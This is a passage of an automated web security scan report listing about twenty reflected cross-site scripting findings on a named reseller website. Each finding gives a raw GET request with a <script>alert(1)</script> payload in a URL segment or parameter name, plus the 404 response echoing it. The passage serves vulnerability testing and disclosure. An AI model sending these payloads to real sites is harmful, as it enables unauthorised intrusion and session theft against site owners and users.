Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9ca54<script>alert(1)</script>5b4fe049bf2/40/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2842. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c0f1<script>alert(1)</script>0966783d2bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/407c0f1<script>alert(1)</script>0966783d2bb/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/407c0f1<script>alert(1)</script>0966783d2bb/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2843. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8abd6<script>alert(1)</script>38114a82dbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes8abd6<script>alert(1)</script>38114a82dbb/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes8abd6<script>alert(1)</script>38114a82dbb/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2844. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 69f9d<script>alert(1)</script>1033a534ec2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos69f9d<script>alert(1)</script>1033a534ec2/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos69f9d<script>alert(1)</script>1033a534ec2/images/ was not found on this server.</p>
...[SNIP]...

2.2845. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4b7ae<script>alert(1)</script>7e47615708a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images4b7ae<script>alert(1)</script>7e47615708a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images4b7ae<script>alert(1)</script>7e47615708a/ was not found on this server.</p>
...[SNIP]...

2.2846. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3af4b<script>alert(1)</script>33b7a75c56a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/?3af4b<script>alert(1)</script>33b7a75c56a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/?3af4b<script>alert(1)</script>33b7a75c56a=1 was not found on this server.</p>
...[SNIP]...

2.2847. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5861a<script>alert(1)</script>ca896c35d5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5861a<script>alert(1)</script>ca896c35d5b/40/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5861a<script>alert(1)</script>ca896c35d5b/40/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2848. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fa59<script>alert(1)</script>527528a0d87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/408fa59<script>alert(1)</script>527528a0d87/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/408fa59<script>alert(1)</script>527528a0d87/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2849. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1b6f<script>alert(1)</script>843cfb38699 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themese1b6f<script>alert(1)</script>843cfb38699/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themese1b6f<script>alert(1)</script>843cfb38699/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2850. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 882f3<script>alert(1)</script>2b5d0e8b11d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos882f3<script>alert(1)</script>2b5d0e8b11d/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos882f3<script>alert(1)</script>2b5d0e8b11d/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2851. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1d0ef<script>alert(1)</script>7c5d94cf782 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images1d0ef<script>alert(1)</script>7c5d94cf782/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images1d0ef<script>alert(1)</script>7c5d94cf782/rating/ was not found on this server.</p>
...[SNIP]...

2.2852. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a9ee1<script>alert(1)</script>3b69b193bb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/ratinga9ee1<script>alert(1)</script>3b69b193bb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/ratinga9ee1<script>alert(1)</script>3b69b193bb/ was not found on this server.</p>
...[SNIP]...

2.2853. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62225<script>alert(1)</script>68ea59a8f32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/?62225<script>alert(1)</script>68ea59a8f32=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/?62225<script>alert(1)</script>68ea59a8f32=1 was not found on this server.</p>
...[SNIP]...

2.2854. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79cf6<script>alert(1)</script>87fb16650c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail79cf6<script>alert(1)</script>87fb16650c2/40/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail79cf6<script>alert(1)</script>87fb16650c2/40/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2855. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b9b8<script>alert(1)</script>34696fc10e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/409b9b8<script>alert(1)</script>34696fc10e8/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/409b9b8<script>alert(1)</script>34696fc10e8/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2856. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 56477<script>alert(1)</script>f3c69bdaa24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes56477<script>alert(1)</script>f3c69bdaa24/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes56477<script>alert(1)</script>f3c69bdaa24/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2857. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc66e<script>alert(1)</script>02e90427b90 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmosbc66e<script>alert(1)</script>02e90427b90/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmosbc66e<script>alert(1)</script>02e90427b90/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2858. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 22005<script>alert(1)</script>8883f7b874d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images22005<script>alert(1)</script>8883f7b874d/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images22005<script>alert(1)</script>8883f7b874d/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2859. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4028c<script>alert(1)</script>740bc540425 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating4028c<script>alert(1)</script>740bc540425/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating4028c<script>alert(1)</script>740bc540425/4half.gif was not found on this server.</p>
...[SNIP]...

2.2860. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c5854<script>alert(1)</script>68942664fce was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/4half.gifc5854<script>alert(1)</script>68942664fce HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/4half.gifc5854<script>alert(1)</script>68942664fce was not found on this server.</p>
...[SNIP]...

2.2861. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

